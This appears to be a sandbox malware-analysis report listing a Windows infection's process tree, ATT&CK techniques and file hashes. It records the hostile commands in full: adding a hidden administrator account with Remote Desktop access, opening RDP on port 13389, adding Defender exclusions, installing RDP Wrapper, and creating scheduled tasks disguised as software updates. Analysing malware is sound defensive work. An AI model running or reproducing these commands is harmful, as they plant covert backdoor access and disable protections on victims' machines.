C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comUno.exe.com f4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comC:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com f5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2768 -
C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeC:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1940
-
-
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff4⤵
- System Location Discovery: System Language Discovery
PID:1752
-
-
C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comInebriato.exe.com R4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comC:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com R5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeC:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:444 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\iLjAI\1119.vbs" "C:\Users\Admin\AppData\Roaming\iLjAI\979.vbs7⤵
- System Location Discovery: System Language Discovery
PID:2980 -
C:\Windows\SysWOW64\cscript.execscript.exe "C:\Users\Admin\AppData\Roaming\iLjAI\1119.vbs" "C:\Users\Admin\AppData\Roaming\iLjAI\979.vbs8⤵
- System Location Discovery: System Language Discovery
PID:908
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\iLjAI\66.vbs" spaiKmXGMX PMpWMfeWBX "C:\Users\Admin\AppData\Roaming\iLjAI\539.vbs" "C:\Users\Admin\AppData\Roaming\iLjAI\figTPULR.bat" "C:\Users\Admin\AppData\Roaming\iLjAI\Ozd.dll"7⤵
- System Location Discovery: System Language Discovery
PID:1100 -
C:\Windows\SysWOW64\cscript.execscript.exe "C:\Users\Admin\AppData\Roaming\iLjAI\66.vbs" spaiKmXGMX PMpWMfeWBX "C:\Users\Admin\AppData\Roaming\iLjAI\539.vbs" "C:\Users\Admin\AppData\Roaming\iLjAI\figTPULR.bat" "C:\Users\Admin\AppData\Roaming\iLjAI\Ozd.dll"8⤵
- System Location Discovery: System Language Discovery
PID:1344
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\iLjAI\Ozd.dll" /tn "MySQLNotifierTask78"7⤵
- System Location Discovery: System Language Discovery
PID:1288 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\iLjAI\Ozd.dll" /tn "MySQLNotifierTask78"8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2364
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\iLjAI\363.vbs" "C:\Users\Admin\AppData\Roaming\iLjAI\979.vbs" "C:\Users\Admin\AppData\Roaming\iLjAI\Ozd.dll"7⤵PID:1540
-
C:\Windows\SysWOW64\cscript.execscript.exe "C:\Users\Admin\AppData\Roaming\iLjAI\363.vbs" "C:\Users\Admin\AppData\Roaming\iLjAI\979.vbs" "C:\Users\Admin\AppData\Roaming\iLjAI\Ozd.dll"8⤵
- System Location Discovery: System Language Discovery
PID:1680
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\iLjAI\Ozd.dll" /tn "CCleaner Update4"7⤵
- System Location Discovery: System Language Discovery
PID:2376 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\iLjAI\Ozd.dll" /tn "CCleaner Update4"8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:816
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\iLjAI\JNIhBGEWXs.bat spaiKmXGMX PMpWMfeWBX"7⤵
- System Location Discovery: System Language Discovery
PID:880 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"8⤵
- System Location Discovery: System Language Discovery
PID:2496 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic group where sid="S-1-5-32-544" get name /value9⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2572
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"8⤵
- System Location Discovery: System Language Discovery
PID:2552 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic group where sid="S-1-5-32-555" get name /value9⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2996
-
-
-
C:\Windows\SysWOW64\net.exenet user spaiKmXGMX PMpWMfeWBX /add8⤵PID:2200
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user spaiKmXGMX PMpWMfeWBX /add9⤵
- System Location Discovery: System Language Discovery
PID:2008
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators spaiKmXGMX /add8⤵
- System Location Discovery: System Language Discovery
PID:2288 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators spaiKmXGMX /add9⤵
- System Location Discovery: System Language Discovery
PID:1784
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" spaiKmXGMX /add8⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
PID:876 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" spaiKmXGMX /add9⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
PID:2216
-
-
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited8⤵
- System Location Discovery: System Language Discovery
PID:2964 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited9⤵
- System Location Discovery: System Language Discovery
PID:2408
-
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v spaiKmXGMX /t REG_DWORD /d "00000000" /f8⤵
- Hide Artifacts: Hidden Users
PID:1620
-
-
C:\Windows\SysWOW64\reg.exereg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f8⤵
- System Location Discovery: System Language Discovery
PID:1600
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=133898⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1248
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2944
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1912
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2836
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2872
-
-
C:\Windows\SysWOW64\timeout.exeTimeout /t 158⤵
- Delays execution with timeout.exe
PID:2920
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\RDP Wrapper\rdpwrap.bat"7⤵
- Loads dropped DLL
PID:2376 -
C:\Windows\SysWOW64\fsutil.exefsutil dirty query C:8⤵
- System Location Discovery: System Language Discovery
PID:1296
-
-
C:\Windows\SysWOW64\sc.exesc queryex "TermService"8⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:580
-
-
C:\Windows\SysWOW64\find.exefind "STATE"8⤵PID:1528
-
-
C:\Windows\SysWOW64\find.exefind /v "RUNNING"8⤵
- System Location Discovery: System Language Discovery
PID:2096
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -u8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2572
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o8⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:2992 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow9⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1916
-
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f8⤵
- System Location Discovery: System Language Discovery
PID:1512
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f8⤵
- System Location Discovery: System Language Discovery
PID:2824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c query session rdp-tcp8⤵
- System Location Discovery: System Language Discovery
PID:2504
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -u8⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2692 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall delete rule name="Remote Desktop"9⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3040
-
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o8⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:1576 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow9⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2832
-
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f8⤵
- System Location Discovery: System Language Discovery
PID:324
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f8⤵
- System Location Discovery: System Language Discovery
PID:1376
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"8⤵
- System Location Discovery: System Language Discovery
PID:1276
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"8⤵
- System Location Discovery: System Language Discovery
PID:2984 -
C:\Windows\SysWOW64\cscript.execscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"9⤵
- System Location Discovery: System Language Discovery
PID:1928
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul8⤵
- System Location Discovery: System Language Discovery
PID:2604 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"9⤵
- System Location Discovery: System Language Discovery
PID:2872
-
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "6.1.7601.17514" /f8⤵
- System Location Discovery: System Language Discovery
PID:1236
-
-
C:\Windows\SysWOW64\findstr.exefindstr /c:"[6.1.7601.17514]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"8⤵
- System Location Discovery: System Language Discovery
PID:1308
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\iLjAI\146.vbs" "C:\Users\Admin\AppData\Roaming\iLjAI\759.vbs" "V201R1ExQllUbmRaVjJ4TVlsWm9TRlJXWjIxWlYxSkNVMFF4VVZSWVFsaFVWMXBzVmpCS1dVcHRNWFZSYm5CRVZrVlJPV1Y2ClZUSlNWRTE1VWxWS1JreFVaRU5SZW1OMENrNUVhRUpSVXpGQ1RtcE9SVXhWV2tOT2EwNUNUbnBOZUU1NlJUTlNiakE5" "C:\Users\Admin\AppData\Roaming\iLjAI\Ozd.dll"7⤵
- System Location Discovery: System Language Discovery
PID:2160 -
C:\Windows\SysWOW64\cscript.execscript.exe "C:\Users\Admin\AppData\Roaming\iLjAI\146.vbs" "C:\Users\Admin\AppData\Roaming\iLjAI\759.vbs" "V201R1ExQllUbmRaVjJ4TVlsWm9TRlJXWjIxWlYxSkNVMFF4VVZSWVFsaFVWMXBzVmpCS1dVcHRNWFZSYm5CRVZrVlJPV1Y2ClZUSlNWRTE1VWxWS1JreFVaRU5SZW1OMENrNUVhRUpSVXpGQ1RtcE9SVXhWV2tOT2EwNUNUbnBOZUU1NlJUTlNiakE5" "C:\Users\Admin\AppData\Roaming\iLjAI\Ozd.dll"8⤵PID:1412
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\iLjAI\Ozd.dll" /tn "Обновление Браузера Яндекс36"7⤵
- System Location Discovery: System Language Discovery
PID:1532 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\iLjAI\Ozd.dll" /tn "Обновление Браузера Яндекс36"8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3012
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 304⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1552
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {1652A976-670A-45DD-9067-31AE22E05B94} S-1-5-21-3533259084-2542256011-65585152-1000:XPAJOTIY\Admin:Interactive:[1]1⤵PID:2636
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\iLjAI\539.vbs" spaiKmXGMX PMpWMfeWBX "C:\Users\Admin\AppData\Roaming\iLjAI\figTPULR.bat"2⤵PID:2788
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\iLjAI\figTPULR.bat3⤵
- Drops file in System32 directory
PID:1240 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"4⤵PID:1716
-
C:\Windows\System32\Wbem\WMIC.exewmic group where sid="S-1-5-32-544" get name /value5⤵PID:2576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"4⤵PID:2692
-
C:\Windows\System32\Wbem\WMIC.exewmic group where sid="S-1-5-32-555" get name /value5⤵PID:2504
-
-
-
C:\Windows\system32\net.exenet user spaiKmXGMX PMpWMfeWBX /add4⤵PID:2004
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user spaiKmXGMX PMpWMfeWBX /add5⤵PID:996
-
-
-
C:\Windows\system32\net.exenet localgroup Administrators spaiKmXGMX /add4⤵PID:2444
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators spaiKmXGMX /add5⤵PID:2864
-
-
-
C:\Windows\system32\net.exenet localgroup Remote Desktop Users spaiKmXGMX /add4⤵PID:2732
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Remote Desktop Users spaiKmXGMX /add5⤵PID:2452
-
-
-
C:\Windows\system32\net.exenet accounts /maxpwage:unlimited4⤵PID:2532
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited5⤵PID:2528
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v spaiKmXGMX /t REG_DWORD /d "00000000" /f4⤵
- Hide Artifacts: Hidden Users
PID:2644
-
-
C:\Windows\system32\reg.exereg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f4⤵PID:2172
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=133894⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:3064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1868
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2272
-
-
C:\Windows\system32\timeout.exeTimeout /t 154⤵
- Delays execution with timeout.exe
PID:1284
-
-
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\iLjAI\759.vbs" V201R1ExQllUbmRaVjJ4TVlsWm9TRlJXWjIxWlYxSkNVMFF4VVZSWVFsaFVWMXBzVmpCS1dVcHRNWFZSYm5CRVZrVlJPV1Y2ClZUSlNWRTE1VWxWS1JreFVaRU5SZW1OMENrNUVhRUpSVXpGQ1RtcE9SVXhWV2tOT2EwNUNUbnBOZUU1NlJUTlNiakE52⤵
- Blocklisted process makes network request
PID:2912
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\iLjAI\539.vbs" spaiKmXGMX PMpWMfeWBX "C:\Users\Admin\AppData\Roaming\iLjAI\figTPULR.bat"2⤵PID:2840
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\iLjAI\figTPULR.bat3⤵
- Drops file in System32 directory
PID:2444 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"4⤵PID:3048
-
C:\Windows\System32\Wbem\WMIC.exewmic group where sid="S-1-5-32-544" get name /value5⤵PID:2076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"4⤵PID:2432
-
C:\Windows\System32\Wbem\WMIC.exewmic group where sid="S-1-5-32-555" get name /value5⤵PID:408
-
-
-
C:\Windows\system32\net.exenet user spaiKmXGMX PMpWMfeWBX /add4⤵PID:632
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user spaiKmXGMX PMpWMfeWBX /add5⤵PID:1788
-
-
-
C:\Windows\system32\net.exenet localgroup Administrators spaiKmXGMX /add4⤵PID:1352
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators spaiKmXGMX /add5⤵PID:2480
-
-
-
C:\Windows\system32\net.exenet localgroup Remote Desktop Users spaiKmXGMX /add4⤵PID:448
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Remote Desktop Users spaiKmXGMX /add5⤵PID:928
-
-
-
C:\Windows\system32\net.exenet accounts /maxpwage:unlimited4⤵PID:1804
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited5⤵PID:668
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v spaiKmXGMX /t REG_DWORD /d "00000000" /f4⤵
- Hide Artifacts: Hidden Users
PID:1176
-
-
C:\Windows\system32\reg.exereg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f4⤵PID:1280
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=133894⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2272
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:496
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1756
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1936
-
-
C:\Windows\system32\timeout.exeTimeout /t 154⤵
- Delays execution with timeout.exe
PID:1920
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
PID:1108
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Account Manipulation
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Server Software Component
1Terminal Services DLL
1Privilege Escalation
Account Manipulation
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Users
1Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Discovery
Password Policy Discovery
1Permission Groups Discovery
1Local Groups
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD53288c284561055044c489567fd630ac2
SHA111ffeabbe42159e1365aa82463d8690c845ce7b7
SHA256ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753
SHA512c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02
-
Filesize
12KB
MD5b365fde3be7855f4254d1e4bba45d260
SHA1b56c6f0402b25c5d68e3a722144f5f4b5bb53d27
SHA2562a175e17c98f9d5f436e23d1c9670f36e54cb82269bccddc87dcfbcfb04d1360
SHA512d08e261c0f5c18041d005029cc6ed6119a8cc446607bb5f683a059d1a193d8e04d3e0b52c9f2ea871fcfa8e043c5c2886cfce5419eaf37c39003236f7a399026
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD517bd660e0926d0f8e0d88dd2a5b31b1b
